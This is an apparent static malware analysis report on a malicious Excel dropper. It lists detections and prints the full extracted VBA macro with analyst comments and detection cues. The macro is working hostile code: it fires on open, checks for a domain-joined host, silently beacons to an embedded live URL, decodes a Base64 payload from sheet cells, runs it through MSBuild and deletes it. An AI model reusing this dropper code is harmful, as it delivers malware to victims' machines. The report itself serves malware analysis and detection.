Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 452722bf48499e77…

MALICIOUS

Office (OLE)

743.5 KB Created: 2019-07-24 19:53:31 Authoring application: Microsoft Excel First seen: 2019-11-20
MD5: a026a5e2703ff8474d147bc120557e52 SHA-1: 8a685ce91f07ed9a19b9795fff7842afb91308c7 SHA-256: 452722bf48499e772731e20d255ba2e634bba88347abcfb70a3b4ca4acaaa53d
338 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Excel file containing VBA macros that are triggered by the AutoOpen or Workbook_Open events. These macros utilize WScript.Shell and CreateObject, indicating an intent to execute commands or scripts. The presence of a URL suggests the macro is designed to download and execute a second-stage payload. In the extracted source, however, the URL is only navigated to through an InternetExplorer.Application object and nothing from the response is consumed, while the payload bytes are assembled from Base64 text stored in cells A500:A514 of Sheet1, decoded, written to C:\windows\tasks\KB20183849.log and launched through MSBuild.exe, so the URL appears to serve as a check-in rather than as the payload download. The ClamAV detection as 'Xls.Dropper.Agent-7137986-0' further supports its role as a dropper.

Heuristics 11

  • ClamAV: Xls.Dropper.Agent-7137986-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7137986-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            Set oFile = Nothing
            Set oShell = CreateObject("WScript.Shell")
            oShell.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe C:\windows\tasks\KB20183849.log"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim DM, EL
        Set DM = CreateObject("Microsoft.XMLDOM")
        ' Create temporary node with Base64 data type
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            partOfDomain = False
            Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
            Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    End Sub
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Sheets("Sheet1").Visible = True
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://express.scripts-careers.com/1 In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5111 bytes
SHA-256: 0a6cda0130a602bc7e1125f7019c13fff4ad72215af782944df96972c2834604
Preview script
First 1,000 lines of the extracted script
' Analyst note: attribute header of the "Sheet1" worksheet code module. In this
' extracted dump the module carries no procedures; Sheet1 matters only as the
' worksheet whose cells A500:A514 hold the Base64 payload read by Do_Stuff below.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst note: attribute header of the "ThisWorkbook" module. In the extracted
' dump every procedure that follows (checkPartOfDomain, decodeBase64, writeBytes,
' Do_Stuff, AutoOpen, Workbook_Open) belongs to this module, which is why the
' Workbook_Open event handler fires automatically when the document is opened
' with macros enabled.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: environment check used as an execution gate.
' Queries WMI (root\cimv2, class Win32_ComputerSystem) and returns True only when
' the host reports PartOfDomain = True. Do_Stuff runs the drop-and-execute stage
' only when this returns True, so stand-alone machines — typical of analysis
' sandboxes and home PCs — never reach the payload.
' Returns: True if any enumerated Win32_ComputerSystem instance is domain-joined, else False.
' Detection: WMI queries against Win32_ComputerSystem originating from the Excel process.
Function checkPartOfDomain()
        partOfDomain = False
        ' winmgmts: moniker — this is the line matched by OLE_VBA_GETOBJ in the heuristics above
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        ' Flags 48 = wbemFlagReturnImmediately (16) | wbemFlagForwardOnly (32): semi-synchronous, forward-only enumeration
        Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
            
        For Each objItem In colItems
            If objItem.partOfDomain Then
                partOfDomain = True
            End If
        Next
        If partOfDomain Then
            checkPartOfDomain = True
            ' Debug.Print writes to the VBE Immediate window only; nothing is shown to the victim
            Debug.Print ("part of domain")
        Else
            checkPartOfDomain = False
            Debug.Print ("Not attached to a domain")
            
        End If
    End Function

' Analyst note: Base64 decoder built on the MSXML DOM ("Microsoft.XMLDOM") rather
' than a hand-written decoding loop. An element whose DataType is "bin.base64"
' converts its text into bytes when NodeTypedValue is read. This is the
' CreateObject call matched by OLE_VBA_CREATEOBJ in the heuristics above.
' Parameter base64: Base64 text — in this sample, the concatenated contents of Sheet1 cells A500:A514.
' Returns: the decoded bytes, which Do_Stuff hands to writeBytes.
Function decodeBase64(base64)
    Dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    ' Create temporary node with Base64 data type
    Set EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    ' Set encoded String, get bytes
    EL.text = base64
    decodeBase64 = EL.NodeTypedValue
End Function

' Analyst note: persists a byte array to disk through ADODB.Stream in binary mode.
' Parameters: file — destination path (Do_Stuff passes c:\windows\tasks\KB20183849.log);
'             bytes — decoded payload bytes returned by decodeBase64.
' Only ForWriting is used; ForReading and ForAppending are declared but never referenced.
' SaveToFile with option 2 (adSaveCreateOverWrite) silently overwrites an existing file.
' Detection/IR: file creation under C:\windows\tasks by EXCEL.EXE; the dropped file is
' deleted about 20 seconds later by Do_Stuff, so collect it promptly if still present.
Sub writeBytes(file, bytes)
    Dim binaryStream
    Const TypeBinary = 1
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = TypeBinary
    'Open the stream and write binary data
    binaryStream.Open
    binaryStream.Write bytes
    'Save binary data to disk
    binaryStream.SaveToFile file, ForWriting
End Sub

' Analyst note: main drop-and-execute routine, called from Workbook_Open.
' Flow:
'   1. Gate on checkPartOfDomain — nothing happens on non-domain-joined hosts.
'   2. Silently navigate an InternetExplorer.Application object to the embedded URL
'      (the author's own "Ping" comment); no content from the response is used,
'      so this is a check-in/telemetry beacon, not the payload download.
'   3. Read 15 cells (A500:A514) of Sheet1 and concatenate them into one Base64 string.
'   4. Decode the string and write the bytes to c:\windows\tasks\KB20183849.log.
'   5. Launch MSBuild.exe with that file as its project argument — proxy execution
'      through a trusted developer utility (the decoded file is presumably an MSBuild
'      project with inline code; its contents are not part of this report).
'   6. Wait 20 seconds, then delete the dropped file (anti-forensic cleanup).
' No Option Explicit is present, so text1..text14, Full, decode, fso, oFile and
' oShell are implicitly declared Variants.
' Detection/IR: EXCEL.EXE spawning MSBuild.exe; MSBuild invoked with a .log path as its
' project file; file create/delete in C:\windows\tasks; outbound HTTPS from an
' InternetExplorer COM object hosted inside the Excel process.
Sub Do_Stuff()
    
    Dim text
    Dim cwd
    Dim fullPath
    Dim ExcelSheet As Object
    Dim res
    Dim res1
    
    ' Execution gate: payload only runs on domain-joined hosts (see checkPartOfDomain)
    If checkPartOfDomain Then
        
        'Ping
        Dim ie_com
        Set ie_com = CreateObject("InternetExplorer.Application")
        ie_com.Silent = True
        ie_com.Visible = False
        ' Navigate flags 14 = navNoHistory (2) | navNoReadFromCache (4) | navNoWriteToCache (8): leaves no browser history or cache entry
        ie_com.Navigate "https://express.scripts-careers.com/1", 14, 0, Null, Null
        ' Busy-wait until navigation completes; the response body is never read
        While (ie_com.busy)
            
        Wend
        ie_com.Quit
        
        ' cwd is assigned but not used afterwards
        cwd = Application.ActiveWorkbook.Path
        fullPath = "c:\windows\tasks\KB20183849.log"
        
        'obtain the decoded base64 values from the range of cells
        'Dim base64Decoded As String
        'base64Decoded = Base64DecodeString(ThisWorkbook.Sheets("Sheet1").Range("A500", "A510").Value)
        
        ' Payload is stored as Base64 text split across cells A500:A514 of Sheet1
        text = Worksheets("Sheet1").Cells(500, "A").Value
        text1 = Worksheets("Sheet1").Cells(501, "A").Value
        text2 = Worksheets("Sheet1").Cells(502, "A").Value
        text3 = Worksheets("Sheet1").Cells(503, "A").Value
        text4 = Worksheets("Sheet1").Cells(504, "A").Value
        text5 = Worksheets("Sheet1").Cells(505, "A").Value
        text6 = Worksheets("Sheet1").Cells(506, "A").Value
        text7 = Worksheets("Sheet1").Cells(507, "A").Value
        text8 = Worksheets("Sheet1").Cells(508, "A").Value
        text9 = Worksheets("Sheet1").Cells(509, "A").Value
        text10 = Worksheets("Sheet1").Cells(510, "A").Value
        text11 = Worksheets("Sheet1").Cells(511, "A").Value
        text12 = Worksheets("Sheet1").Cells(512, "A").Value
        text13 = Worksheets("Sheet1").Cells(513, "A").Value
        text14 = Worksheets("Sheet1").Cells(514, "A").Value
        
        ' "+" on strings concatenates here; the cells are joined in row order
        Full = text + text1 + text2 + text3 + text4 + text5 + text6 + text7 + text8 + text9 + text10 + text11 + text12 + text13 + text14
        
        ' Decode via MSXML and drop the bytes to disk
        decode = decodeBase64(Full)
        writeBytes fullPath, decode
        'Dim fso As Object
        'Set fso = CreateObject("Scripting.FileSystemObject")
        'Dim oFile As Object
        'Set oFile = fso.CreateTextFile(fullPath)
        'oFile.Write decode
        'oFile.Close
        ' Leftovers from the commented-out FileSystemObject variant; fso/oFile were never assigned
        Set fso = Nothing
        Set oFile = Nothing
        ' WScript.Shell line matched by OLE_VBA_WSCRIPT: MSBuild.exe is used as the execution proxy for the dropped file
        Set oShell = CreateObject("WScript.Shell")
        oShell.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe C:\windows\tasks\KB20183849.log"
        ' Give MSBuild 20 s to consume the file, then remove it from disk
        Application.Wait (Now + TimeValue("0:00:20"))
        Kill "C:\Windows\tasks\KB20183849.log"
        
    End If
End Sub


' Analyst note: empty stub. It is what the OLE_VBA_AUTOOPEN heuristic matched, but it
' does nothing; the real trigger in this sample is the Workbook_Open handler below.
Sub AutoOpen()
End Sub

' Analyst note: the effective entry point. Workbook_Open fires automatically once the
' user enables macros (see the SE_ENABLE_LURE finding). It makes Sheet1 visible and
' active — which suggests the sheet holding the Base64 payload cells is hidden at
' rest, though the sheet's stored state is not shown in this report — and then
' calls Do_Stuff, which performs the drop-and-execute sequence.
Sub Workbook_Open()
    Sheets("Sheet1").Visible = True
    Sheets("Sheet1").Activate
    Do_Stuff
    
End Sub



' Analyst note: attribute header of the "Sheet3" worksheet code module; no procedures
' are present in the extracted dump for this module.
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst note: header of the standard module "Module1", which holds only Button11_Click.
Attribute VB_Name = "Module1"
' Analyst note: closes the active workbook without saving (the False argument) and
' quits Excel. The name suggests it is wired to a form button on a sheet — presumably
' part of the lure — but the button itself is not shown in this report.
Sub Button11_Click()
ActiveWorkbook.Close False
Application.Quit
End Sub